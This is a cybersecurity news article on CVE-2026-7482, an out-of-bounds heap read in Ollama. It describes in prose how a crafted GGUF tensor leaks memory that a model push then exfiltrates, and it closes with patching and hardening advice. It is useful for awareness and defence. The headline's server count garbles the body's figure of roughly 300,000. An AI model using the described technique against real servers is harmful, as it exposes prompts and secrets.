Critical Ollama Memory Leak Exposes 300 Vulnerability Servers

A newly identified major security flaw now jeopardizes Ollama, a platform extensively used for running local AI models. The vulnerability places one of the most prominent tools in the local AI landscape at risk of a high-profile exposure event.

The issue, dubbed “Bleeding Llama,” allows unauthenticated attackers to access the Ollama process and extract sensitive data directly from memory, putting roughly 300,000 internet-facing servers worldwide at risk.

With only three API calls, an attacker can extract prompts, system instructions, and environment variables from exposed deployments, turning AI infrastructure into an unexpected source of data leakage.

Discovered by cybersecurity researchers at Cyera and assigned a critical CVSS score of 9.1 by the Echo CVE Numbering Authority, CVE-2026-7482 represents a massive enterprise risk.

Ollama uploads models with leaks(source :cyera) — Ollama uploads models with leaks (source: Cyera)

Ollama lets users create model instances from uploaded files, including GGUF model files used to package tensors, metadata, and other model information for local inference.

Ollama Vulnerability Exposes Servers

The vulnerable path is tied to the model-creation flow, where Ollama processes uploaded files via its API and prepares them for conversion and saving.

Researchers found that a crafted GGUF file can abuse this process by declaring a tensor shape that is much larger than the actual data stored in the file, causing the server to read beyond the intended buffer.

The weakness appears during tensor conversion, where Ollama uses Go’s unsafe functionality for low-level memory operations instead of staying inside normal safety boundaries.

Because the software does not properly validate that the tensor metadata matches the actual file size, the conversion routine can trigger an out-of-bounds heap read and capture unrelated memory contents nearby.

Attacker sends malformed GGUF tensor causing memory overread(source :cyera) — Attacker sends malformed GGUF tensor, causing memory overread (source: Cyera)

That leaked memory is then carried forward into a newly created model file instead of being discarded.

The attack becomes especially dangerous because researchers found a way to preserve the leaked memory in readable form during conversion.

By using a float-16 source tensor and forcing a float-32 destination, the attacker can rely on a lossless conversion path that preserves the stolen bytes rather than corrupting them through lossy quantization.

Quantization reversal exposes heap data(source : cyera) — Quantization reversal exposes heap data (source: Cyera)

Once the malicious model is created, Ollama’s push functionality can upload it to an attacker-controlled server, effectively exfiltrating the leaked memory from the target system.

According to the Cyera research, the leaked heap data can include user prompts, system prompts from other models, and environment variables stored by the host running Ollama.

In enterprise environments, this may expose API keys, internal instructions, proprietary code, customer-related content, and other highly sensitive material processed by AI workflows.

The risk grows further when Ollama is connected to external tools or coding assistants, because those outputs can also pass through memory and become part of what an attacker steals.

The issue affects Ollama deployments before version 0.17.1, which includes the relevant security fix referenced by the researchers and Echo.

Organizations should upgrade immediately, remove any public exposure, place Ollama behind authentication controls, and restrict access to trusted internal networks only.

Any environment that has been internet-accessible should also review logs, rotate secrets, and assume that prompts and environment data may already have been exposed.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

Social Media

Critical Ollama Memory Leak Exposes 300 Vulnerability Servers

Ollama Vulnerability Exposes Servers

Tags:

Marcus Rodriguez

Microsoft Teams Android: Join Third-Party Meetings via

Hackers Used Claude AI to Attack Water & Drainage Utilities

No Comment! Be the first one.

Leave a Reply Cancel reply

Popular Posts

Massive 2.45B-Request DDoS Attack Used 1.2 Million IPs to Evade

Google Chrome 148 Released with Fix for 127 Security

Salat Malware Uses QUIC & WebSocket for Stealth Channels Stealthy

Top Authors

Let's Connect

Related Posts

GlassWorm Attacks macOS via Malicious VS Code…

ClickFix Attack Hides Malicious Code via Stegan Security

MongoBleed Detector Tool Detects Critical MongoDB CVE-

Conti Ransomware Gang Leaders & Infrastructure Exposed

Quick Links

Categories

Let's keep in touch

Follow Us

Social Media

Search the Site

Recent Posts

Critical Ollama Memory Leak Exposes 300 Vulnerability Servers

Ollama Vulnerability Exposes Servers

Tags:

Share Article

Microsoft Teams Android: Join Third-Party Meetings via

Hackers Used Claude AI to Attack Water & Drainage Utilities

No Comment! Be the first one.

Leave a Reply Cancel reply

Popular Posts

Top Authors

Let's Connect

Related Posts

Quick Links

Categories

Let's keep in touch

Follow Us